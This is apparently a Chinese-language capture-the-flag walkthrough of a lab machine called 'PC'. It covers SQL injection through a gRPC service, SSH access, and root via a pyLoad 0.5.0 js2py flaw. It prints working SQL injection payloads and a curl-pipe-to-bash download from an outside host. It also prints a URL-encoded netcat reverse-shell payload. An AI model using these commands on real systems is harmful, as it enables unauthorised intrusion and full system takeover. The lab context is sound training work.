[Meachines] [Easy] PC gRPC HTTP/2 SQLI+KTOR-HTTP扫描+pyLoad 0.5.0 js2py滥用权限提升

发布于:2025-02-22 ⋅ 阅读:(15) ⋅ 点赞:(0)

Information Gathering

IP Address Opening Ports
10.10.11.214 TCP:22,50051

$ ip='10.10.11.214'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 91bf44edea1e3224301f532cea71e5ef (RSA)
|   256 8486a6e204abdff71d456ccf395809de (ECDSA)
|_  256 1aa89572515e8e3cf180f542fd0a281c (ED25519)
50051/tcp open  unknown

gRPC HTTP/2 SQLI

image.png

https://github.com/fullstorydev/grpcurl/releases/latest/download/grpcurl_1.9.2_linux_x86_64.tar.gz

$ grpcurl -plaintext 10.10.11.214:50051 list

image-1.png

$ grpcurl -plaintext 10.10.11.214:50051 list SimpleApp

image-2.png

$ grpcurl -plaintext 10.10.11.214:50051 describe SimpleApp

image-3.png

$ grpcurl -plaintext 10.10.11.214:50051 describe LoginUserRequest

image-4.png

image-5.png

$ grpcurl -plaintext 10.10.11.214:50051 describe getInfoRequest
请求参数

image-6.png

注册用户

$ grpcurl -plaintext -d '{"username":"maps","password":"maps"}' 10.10.11.214:50051 SimpleApp.RegisterUser

image-7.png

$ grpcurl -plaintext -vv -d '{"username":"maps","password":"maps"}' 10.10.11.214:50051 SimpleApp.LoginUser

image-9.png

token: b'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoibWFwcyIsImV4cCI6MTczOTg2MzQyOX0.CHbQPJZifCuzIQ7IzTJlN8BYd9T4SStEwEL4ygJpygM'

$ grpcurl -plaintext -H 'token:eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoibWFwcyIsImV4cCI6MTczOTg2MzQyOX0.CHbQPJZifCuzIQ7IzTJlN8BYd9T4SStEwEL4ygJpygM' -d '{"id": "-1 union select 2-- -"}' 10.10.11.214:50051 SimpleApp.getInfo

image-9.png

$ grpcurl -plaintext -H 'token:eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoibWFwcyIsImV4cCI6MTczOTg5NTYyNn0.ad2gHY5jP89gKHHTwRndAV_vC3nLAW48qNNGBs5SSxY' -d '{"id": "-1 UNION SELECT GROUP_CONCAT(username || password) FROM accounts;--"}' 10.10.11.214:50051 SimpleApp.getInfo

image-11.png

HereIsYourPassWord1431

$ ssh sau@10.10.11.214

image-12.png

User.txt

853046f61d1950319e09a0664f03abc6

Privilege Escalation:pyLoad 0.5.0 js2py Abuse

https://github.com/MartinxMax/KTOR/blob/main/ktor.sh

$ curl http://10.10.16.24/ktor.sh|bash -s -- -l -p all

image-13.png

$ ssh -f -N -L 8000:127.0.0.1:8000 -L 9666:127.0.0.1:9666 sau@10.10.11.214

http://127.0.0.1:8000/login?next=http%3A%2F%2F127.0.0.1%3A8000%2F

image-14.png

$ ps aux | grep pyload

image-15.png

image-16.png

https://huntr.com/bounties/3fd606f7-83e1-4265-b083-2e1889a05e65

$ curl -i -s -k -X POST \
--data-binary "jk=pyimport%20os;os.system(\"rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fbash%20-i%202%3E%261%7Cnc%2010.10.16.24%201234%20%3E%2Ftmp%2Ff\");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa" \
"http://localhost:8000/flash/addcrypted2"

image-17.png

Root.txt

6c032585f46aad66f4762f8f95e59fe1

网站公告

今日签到

点亮在社区的每一天
去签到

热门文章

最新发布